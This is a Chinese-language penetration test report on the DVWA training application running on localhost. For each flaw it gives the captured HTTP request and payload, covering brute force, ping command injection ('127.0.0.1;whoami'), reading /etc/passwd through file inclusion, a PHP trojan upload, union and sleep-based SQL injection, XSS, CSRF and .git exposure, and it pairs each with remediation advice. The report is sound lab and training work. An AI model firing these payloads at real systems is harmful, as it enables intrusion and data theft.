DVWA 渗透测试报告


弱口令暴力破解漏洞

http://localhost:8080/vulnerabilities/brute/

功能点:Brute Force -Login-GET

账户admin

密码password

漏洞请求:

GET /vulnerabilities/brute/?username=admin&password=password&Login=Login HTTP/1.1
Host: localhost:8080
sec-ch-ua: "Chromium";v="119", "Not?A_Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.199 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/vulnerabilities/brute/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=r5r4ithugsb24rsmnpbq2a1mq1; security=low
Connection: close
username=admin&password=password&Login=Login


漏洞截图:

漏洞危害描述:该漏洞可导致获取账户,进而扩大攻击面

修复建议: 改用强密码

Ping测试命令执行漏洞

http://localhost:8080/vulnerabilities/exec/#

功能点:Command Injection - Ping a device - Enter an IP address

漏洞请求:

POST /vulnerabilities/exec/index.php HTTP/1.1
Host: localhost:8080
Content-Length: 79
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="119", "Not?A_Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.199 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/vulnerabilities/exec/index.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: security=low; PHPSESSID=r5r4ithugsb24rsmnpbq2a1mq1; security=low
Connection: close

ip=127.0.0.1%3Bwhoami&Submit=Submit&user_token=a199559c7a052b3ceb8fa138ec003bc9

漏洞截图:

漏洞危害描述:该漏洞可导致命令执行,进而提权利用

修复建议: 添加输入过滤如屏蔽;后的内容,正则表达式提取ip等

CSRF跨站请求伪造漏洞

http://localhost:8080/vulnerabilities/exec/#

功能点:CSRF - Change your admin password – GET

漏洞请求:

GET /vulnerabilities/csrf/?password_new=admin&password_conf=admin&Change=Change HTTP/1.1
Host: localhost:8080
sec-ch-ua: "Chromium";v="119", "Not?A_Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.199 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/vulnerabilities/csrf/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=r5r4ithugsb24rsmnpbq2a1mq1; security=low
Connection: close


修改重置密码的字段

http://localhost:8080/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change

放到image内自动利用

漏洞截图:

漏洞危害描述:该漏洞可导致伪造恶意请求,进而获得账户控制权

修复建议: 限制cookie跨站

File Inclusion文件包含漏洞

http://localhost/vulnerabilities/fi

功能点:File Inclusion - File Inclusion – GET

漏洞请求:

GET /vulnerabilities/fi/?page=/etc/passwd HTTP/1.1
Host: localhost
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="119", "Not?A_Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.199 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=33fbfr6afjaaqffiehhb30kgc0; security=low
Connection: close

修改文件查询字段

http://localhost/vulnerabilities/fi/?page=file

可利用/etc/passwd

漏洞截图:

漏洞危害描述:该漏洞可导致系统文件泄露,使用户获取关键信息,造成扩大利用的机会

修复建议: 正则表达式,限制跨目录查询,使用白名单机制进行防护,限制查询范围

File Upload文件上传漏洞

http://localhost/vulnerabilities/fi

功能点:File Inclusion - File Inclusion – GET

漏洞请求:

POST /vulnerabilities/upload/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 1155
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiO7YxRbzDYO6BT04
Cookie: PHPSESSID=olh8nsjbjq9ntkf6hk0o2h60p0; security=low
DNT: 1
Host: localhost
Origin: http://localhost
Referer: http://localhost/vulnerabilities/upload/
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120", "Microsoft Edge";v="120"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"

------WebKitFormBoundaryiO7YxRbzDYO6BT04
Content-Disposition: form-data; name="MAX_FILE_SIZE"

100000
------WebKitFormBoundaryiO7YxRbzDYO6BT04
Content-Disposition: form-data; name="uploaded"; filename=".ws.php"
Content-Type: application/octet-stream


------WebKitFormBoundaryiO7YxRbzDYO6BT04
Content-Disposition: form-data; name="Upload"

Upload
------WebKitFormBoundaryiO7YxRbzDYO6BT04—

修改文件查询字段

http://localhost/vulnerabilities/upload/

可上传php木马

漏洞截图:

漏洞危害描述:该漏洞可导致用户直接查询服务器敏感信息

修复建议:限制文件上传格式,存入文件时修改文件名,需要存在上传模板,做好权限认证,匿名者不可访问,文件上传目录设置禁止脚本文件执行,设置上传白名单,只允许图片上传,上传的后缀名,一定要设置图片格式.jpg .png .gif

SQL Injection SQL注入漏洞

http://localhost/vulnerabilities/sqli/

功能点:Vulnerability: SQL Injection – UserID - GET

漏洞请求:

GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: keep-alive
Cookie: PHPSESSID=olh8nsjbjq9ntkf6hk0o2h60p0; security=low
DNT: 1
Host: localhost
Referer: http://localhost/vulnerabilities/sqli/?id=admin&Submit=Submit
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120", "Microsoft Edge";v="120"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
id=-1%27+union+select+1%2Cdatabase%28%29+%23&Submit=Submit


漏洞截图:

漏洞危害描述:该漏洞可导致用户直接查询服务器敏感信息

修复建议:对数据库信息明文加密,采用sql语句过滤策略,使用预编译语句

SQL Injection (Blind) SQL盲注漏洞

http://localhost/vulnerabilities/sqli_blind/

功能点:Vulnerability: SQL Injection (Blind) – UserID - GET

漏洞请求:

GET /vulnerabilities/sqli_blind/?id=1&Submit=Submit HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: keep-alive
Cookie: PHPSESSID=olh8nsjbjq9ntkf6hk0o2h60p0; security=low
DNT: 1
Host: localhost
Referer: http://localhost/vulnerabilities/sqli_blind/
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120", "Microsoft Edge";v="120"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
id=1%27+and+sleep%285%29+%23&Submit=Submit



通过浏览器响应时间查看判断存在sql盲注漏洞

漏洞截图:

漏洞危害描述:该漏洞可导致用户直接查询服务器敏感信息

修复建议:对数据库信息明文加密,采用sql语句过滤策略,使用预编译语句

XSS (Reflected) 反射漏洞

http://localhost/vulnerabilities/xss_r/

功能点:Vulnerability: Reflected Cross Site Scripting (XSS) - GET

漏洞请求:

GET /vulnerabilities/xss_r HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: keep-alive
Cookie: PHPSESSID=olh8nsjbjq9ntkf6hk0o2h60p0; security=low
DNT: 1
Host: localhost
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120", "Microsoft Edge";v="120"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
name=%3Cscript%3Ealert%28%27hello+world%27%29%3C%2Fscript%3E


漏洞截图:

漏洞危害描述:攻击者会向web页面(input表单、URL、留言版等位置)插入恶意JavaScript代码,导致管理员/用户访问时触发,从而达到攻击者的目的。

修复建议: 对输入和URL参数进行过滤(白名单和黑名单);HTML实体编码;对输出内容进行编码

XSS (Stored) 存储漏洞

http://localhost/vulnerabilities/xss_s/

功能点:Vulnerability: Stored Cross Site Scripting (XSS) - GET

漏洞请求:

POST /vulnerabilities/xss_s/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 96
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=olh8nsjbjq9ntkf6hk0o2h60p0; security=low
DNT: 1
Host: localhost
Origin: http://localhost
Referer: http://localhost/vulnerabilities/xss_s/
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120", "Microsoft Edge";v="120"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
txtName=a&mtxMessage=%3Cscript%3Ealert%28%27hello+world%27%29%3C%2Fscript%3E&btnSign=Sign+Guestbook


漏洞截图:

漏洞危害描述:攻击者会向web页面(input表单、URL、留言版等位置)插入恶意JavaScript代码,导致管理员/用户访问时触发,从而达到攻击者的目的。

修复建议: 对输入和URL参数进行过滤(白名单和黑名单);HTML实体编码;对输出内容进行编码

Git源代码泄露

http://localhost:8080/vulnerabilities/brute/

漏洞请求:

GET /.git/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cache-Control: max-age=0
Connection: keep-alive
Cookie: PHPSESSID=olh8nsjbjq9ntkf6hk0o2h60p0; security=low
DNT: 1
Host: localhost
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120", "Microsoft Edge";v="120"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"


漏洞截图:

漏洞危害描述:攻击者可以利用这个目录 , 下载git文件夹 , 就可以利用其中储存的版本控制信息,完全恢复网站后台的代码和目录结构

修复建议: 对.git目录的访问权限进行控制,在每次pull到web目录下之后删除.git文件夹,将./git 访问重定向到404,别用git上传网站源码,或者采用CI/CD自动更新网站,避免手动操作出错

会话固定漏洞

漏洞截图:

发现登录前后session相同

漏洞危害描述:会话劫持,获得用户的敏感信息

修复建议:在用户登录成功后重新创建一个session id,登录前的匿名会话强制失效, session id与浏览器绑定:session id与所访问浏览器有变化,立即重置。session id与所访问的IP绑定:session id与所访问IP有变化,立即重置。

目录浏览/遍历漏洞

http://localhost:80/docs/

http://localhost:80/dvwa/

http://localhost:80/vulnerabilities/

漏洞截图:

漏洞危害描述:攻击者通过访问网站某一目录时,该目录没有默认首页文件或没有正确设置默认首页文件,将会把整个目录结构列出来,将网站结构完全暴露给攻击者; 攻击者可能通过浏览目录结构,访问到某些隐秘文件

修复建议:对用户提交的内容进行严格的过滤,比如过滤目录跳转符,字符截断符,dir命令等。

Comments

Leave a comment